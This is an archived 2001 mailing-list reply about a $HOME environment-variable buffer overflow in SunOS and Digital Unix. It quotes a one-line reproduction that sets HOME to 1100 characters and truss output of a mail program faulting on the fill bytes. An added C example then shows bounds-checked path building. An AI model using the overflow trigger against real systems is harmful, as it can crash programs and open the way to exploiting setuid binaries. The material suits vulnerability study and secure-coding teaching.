Re: $HOME buffer overflow in SunOS 5.8 x86

From: Nicolas Dubee (ndubeeat_private)
Date: Tue Jun 05 2001 - 18:12:55 PDT


    > On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
    > > $HOME buffer overflow in SunOS 5.8 x86
    
    ...
    
    >Digital Unix V4.0C is vulnerable:
    >
    >digital> uname -a
    >OSF1 digital V4.0 564.32 alpha
    >digital> setenv HOME `perl -e 'print "a"x1100'`
    >Received disconnect: Command terminated on signal 6.
    >
    >[and I am logged out of the machine]
    >
    
    That rather looks like a bug in the shell itself, or in some library function used in
    it. What shell are you using?
    
    As for the Sparc mail, at least 2.6 is also affected (most surely others as
    well; the program doesn't actually crash but loops in a signal handler):
    
       yoki# uname -a
       SunOS yoki 5.6 Generic_105181-06 sun4u sparc SUNW,Ultra-1
       yoki# more truss.output
    ... 
       getgid()                                        = 1 [6]
       setgid(1)                                       = 0
       access("dead.letter", 0)                        Err#2 ENOENT
       access(".", 2)                                  = 0
       stat("dead.letter", 0xEFFFD1A8)                 Err#2 ENOENT
       brk(0x0003F120)                                 = 0
       brk(0x00041120)                                 = 0
       access("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 0) Err#78 ENAMETOOLONG
       access("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 2) Err#78 ENAMETOOLONG
           Incurred fault #5, FLTACCESS  %pc = 0x00017EDC
             siginfo: SIGBUS BUS_ADRALN addr=0x41414209
           Received signal #10, SIGBUS [caught]
             siginfo: SIGBUS BUS_ADRALN addr=0x41414209
       sigaction(SIGBUS, 0xEFFFCC50, 0xEFFFCCD0)       = 0
       sigaction(SIGBUS, 0xEFFFCC50, 0xEFFFCCD0)       = 0
       write(2, " A A A A A A A A A A A A".., 9139)    = 9139 
       write(2, " :   E R R O R   s i g n".., 15)      = 15
       write(2, " 1 0\n", 3)                           = 3
    ...
    
    -nd
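The truss output above shows the failure pattern: access() is handed the oversized path and correctly returns ENAMETOOLONG, but the program carries on and copies the same value somewhere fixed-size, ending in a SIGBUS at an address built from the fill bytes. The following is an added example, not Sun's mail code and not code from the poster; it shows the bounded way to build "$HOME/dead.letter" in C, refusing the value with ENAMETOOLONG instead of overrunning the buffer. The function names, the PATH_MAX-sized buffer and the 1100-byte test value are assumptions made for the example; only the leaf name "dead.letter" comes from the truss output.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 1024   /* assumption: fall back to a common limit if the header lacks it */
#endif

/* Build "<home>/<leaf>" into a caller-supplied buffer of outlen bytes.
 * Returns 0 on success. Returns -1 with errno = ENAMETOOLONG when the result
 * would not fit, rather than writing past the end of the buffer, which is the
 * class of bug the truss output above points at: a too-long HOME reaching code
 * that copies it into a fixed-size buffer. */
int build_home_path(const char *home, const char *leaf, char *out, size_t outlen)
{
    if (home == NULL || leaf == NULL || out == NULL || outlen == 0) {
        errno = EINVAL;
        return -1;
    }
    /* snprintf writes at most outlen bytes (NUL included) and returns the
     * length the complete string would have had, so truncation is detectable. */
    int n = snprintf(out, outlen, "%s/%s", home, leaf);
    if (n < 0) {
        return -1;              /* formatting failure; errno is already set */
    }
    if ((size_t)n >= outlen) {
        out[0] = '\0';          /* never hand back a silently truncated path */
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Convenience wrapper that reads HOME from the environment, the way a mail
 * program locating its dead.letter file would. */
int dead_letter_path(char *out, size_t outlen)
{
    const char *home = getenv("HOME");
    if (home == NULL || home[0] == '\0') {
        errno = ENOENT;
        return -1;
    }
    return build_home_path(home, "dead.letter", out, outlen);
}

int main(void)
{
    char path[PATH_MAX];

    /* Constructed input: a 1100-byte HOME like the one in the report. */
    char *longhome = malloc(1101);
    if (longhome == NULL)
        return 1;
    memset(longhome, 'a', 1100);
    longhome[1100] = '\0';
    setenv("HOME", longhome, 1);
    if (dead_letter_path(path, sizeof path) != 0)
        printf("rejected oversized HOME: %s\n", strerror(errno));

    /* Constructed input: a HOME of ordinary length is accepted. */
    setenv("HOME", "/export/home/user", 1);
    if (dead_letter_path(path, sizeof path) == 0)
        printf("ok: %s\n", path);

    free(longhome);
    return 0;
}
```

The same check applies to any other environment-derived path (MAIL, TMPDIR, and so on): size the destination once, let snprintf report the would-be length, and treat a result of outlen or more as an error the caller must handle, not as data to keep copying.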
    
    This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 22:24:41 PDT